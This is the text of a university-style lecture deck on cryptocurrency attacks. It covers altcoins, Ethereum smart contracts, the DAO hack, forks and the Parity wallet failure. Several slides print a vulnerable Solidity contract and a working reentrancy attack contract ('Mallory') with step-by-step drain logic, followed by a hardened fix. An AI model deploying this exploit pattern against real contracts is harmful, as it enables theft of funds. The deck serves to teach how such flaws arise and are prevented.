More Cryptocurrency Attacks - - PowerPoint PPT Presentation



slide-1
SLIDE 1

More Cryptocurrency Attacks

http://blockchain.unica.it/projects/ethereum-survey/index.html
http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/
https://hackernoon.com/what-caused-the-latest-100-million-ethereum-bug-and-a-detection-tool-for-similar-bugs-7b80f8ab7279

slide-2
SLIDE 2

Last Class

  • Majority attacks
  • Block withholding attacks
  • Spam attacks
  • Sybil attacks
  • Blacklisting
  • Fungibility
  • Money laundering
slide-3
SLIDE 3

Last Class

  • With the rise of 51% attacks:
  • why? to what end?
  • when will this stop?
  • What are the points of centralization in this network?
  • Is this inevitable?
slide-4
SLIDE 4

Cryptocurrencies

  • First altcoin: Bitcoin testnet
  • Second altcoin: Namecoin (DNS system)
  • over two thousand altcoins/tokens/etc.
slide-5
SLIDE 5

But… why?

  • Improvements to Bitcoin
  • Alternatives to Bitcoin
  • Other functionality complementary to Bitcoin
  • Make money for founders
slide-6
SLIDE 6

But… how?

  • Altcoins: have their own blockchain
  • Tokens: built on top of cryptocurrencies
slide-7
SLIDE 7

Alternative Proof of Work Mechanisms

  • Litecoin: scrypt
  • Cuckoo Cycle
  • etc.
slide-8
SLIDE 8

Alternative functionality

  • NameCoin: DNS system
  • Ethereum: Turing complete
  • ZCash/Monero/others: “Private”
slide-9
SLIDE 9

Namecoin

  • “completes” Zooko’s Triangle
  • Blockchain-based DNS
  • First fork of Bitcoin
  • Merge mined with Bitcoin:
  • same hash function
slide-10
SLIDE 10
slide-11
SLIDE 11

Ethereum

  • Currently the second most popular cryptocurrency
  • First proposed as a system built on top of Bitcoin
  • Started to create Turing-complete money contracts: “smart contracts”
  • Ether: currency which is input/output to contracts
  • Gas: execution cost of instructions
slide-12
SLIDE 12

Smart Contracts

  • Run on blockchain and executed by all nodes
  • Created by posting a transaction
  • Identified by address
  • Can hold, receive, and send money
  • Once deployed, cannot be changed
slide-13
SLIDE 13

Ethereum uses

  • DApps
  • Distributed applications
  • CryptoKitties!
  • Ponzi schemes!
  • Tokens
  • https://coinmarketcap.com/tokens/views/all/
slide-14
SLIDE 14

The DAO

  • Crowdfunding platform
  • Envisioned as a leaderless organization
  • Anybody could hold DAO tokens
  • DAO creators together agreed on rules
  • Raised 12.7M Ether ($150M)
slide-15
SLIDE 15

Simplified DAO

  • Solidity:
  • high-level programming language to write smart contracts with
  • python-ish
  • Enter contract: donate
  • Exit contract: withdraw
  • Fallback option:
slide-16
SLIDE 16

Simplified DAO

contract SimpleDAO {
    mapping (address => uint) public credit;

    function donate(address to) { credit[to] += msg.value; }

    function queryCredit(address to) returns (uint) { return credit[to]; }

    function withdraw(uint amount) {
        if (credit[msg.sender] >= amount) {
            msg.sender.call.value(amount)();   // sends ether and runs the recipient's fallback
            credit[msg.sender] -= amount;      // credit is reduced only after the call returns
        }
    }
}

slide-17
SLIDE 17

Attack

contract Mallory {
    SimpleDAO public dao = SimpleDAO(0x354...);
    address owner;

    function Mallory() { owner = msg.sender; }

    // fallback function: runs whenever Mallory receives ether
    function() { dao.withdraw(dao.queryCredit(this)); }

    function getJackpot() { owner.send(this.balance); }
}

slide-18
SLIDE 18

Attack

Step 1: Attacker donates ether for Mallory.

contract SimpleDAO {
    mapping (address => uint) public credit;

    function donate(address to) { credit[to] += msg.value; }

    function queryCredit(address to) returns (uint) { return credit[to]; }

    // withdraw() as on slide 16
}

slide-19
SLIDE 19

Attack

contract Mallory {
    SimpleDAO public dao = SimpleDAO(0x354...);
    address owner;

    function Mallory() { owner = msg.sender; }

    // fallback function: runs whenever Mallory receives ether
    function() { dao.withdraw(dao.queryCredit(this)); }

    function getJackpot() { owner.send(this.balance); }
}

Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback.

slide-20
SLIDE 20

Attack

Step 2: Mallory’s fallback calls the withdraw function.

function withdraw(uint amount) {
    if (credit[msg.sender] >= amount) {
        msg.sender.call.value(amount)();
        credit[msg.sender] -= amount;
    }
}

slide-21
SLIDE 21

Attack

Step 3: The withdraw function then invokes Mallory’s default again via call.

function withdraw(uint amount) {
    if (credit[msg.sender] >= amount) {
        msg.sender.call.value(amount)();   // control passes to Mallory's fallback here
        credit[msg.sender] -= amount;      // not yet executed when the fallback runs
    }
}

slide-22
SLIDE 22

Attack

contract Mallory {
    SimpleDAO public dao = SimpleDAO(0x354...);
    address owner;

    function Mallory() { owner = msg.sender; }

    // fallback function: runs whenever Mallory receives ether
    function() { dao.withdraw(dao.queryCredit(this)); }

    function getJackpot() { owner.send(this.balance); }
}

Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!

slide-23
SLIDE 23

Attack

  • We can repeat ad nauseam until:
  • contract gas is exhausted OR
  • balance of DAO is zero.
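
The re-entry on the preceding slides is possible because withdraw sends ether before it reduces credit. A hardened form of the same contract follows as an added example (not from the original slides), written for Solidity 0.8; the names SimpleDAOFixed, locked and nonReentrant are assumptions of this example:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: SimpleDAO with the withdraw ordering corrected.
contract SimpleDAOFixed {
    mapping(address => uint256) public credit;

    // Hand-rolled reentrancy lock (hypothetical name), a second line of
    // defence in case a later change reintroduces a call-before-update bug.
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function donate(address to) external payable {
        credit[to] += msg.value;
    }

    function queryCredit(address to) external view returns (uint256) {
        return credit[to];
    }

    function withdraw(uint256 amount) external nonReentrant {
        // Check: the caller must hold enough credit.
        require(credit[msg.sender] >= amount, "insufficient credit");

        // Effect: reduce the credit BEFORE handing control to the caller.
        // A fallback that re-enters now sees the reduced balance.
        credit[msg.sender] -= amount;

        // Interaction: the external call comes last, and a failed send
        // reverts the whole transaction, restoring the credit.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

With this ordering, a fallback that calls withdraw again is stopped by the lock, and even without the lock the credit check would fail because the credit was already reduced.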
slide-24
SLIDE 24

But wait!

7 days before drain started

slide-25
SLIDE 25

But wait!

5 days before drain started

slide-26
SLIDE 26

But wait!

  • Code was attacked after it was patched.
  • But how can that be?
  • Remember: once deployed, cannot change
slide-27
SLIDE 27

Ethereum Price Shock

slide-28
SLIDE 28

Forks

  • Fork: update in software
  • Hard Fork
  • requires software update; old version incompatible
  • Soft Fork
  • old version compatible with new software
slide-29
SLIDE 29

Forks

slide-30
SLIDE 30

What to do next with Ethereum?

  • Nothing
  • Gas limit
  • Ban spam addresses
  • Soft Fork
  • Hard Fork
slide-31
SLIDE 31

What happened next

https://www.ofnumbers.com/2016/07/28/ethereum-core-and-ethereum-classic-for-dummies/

slide-32
SLIDE 32

Parity Multisig

  • Ethereum Wallet
  • One person “killing” a wallet killed every wallet that relied on the contract

slide-33
SLIDE 33
slide-34
SLIDE 34
slide-35
SLIDE 35
slide-36
SLIDE 36

Questions

  • If we can’t secure code in a normal case, how will we be able to secure it on a blockchain?
  • Do new blockchains create decentralization or centralization pressures? how?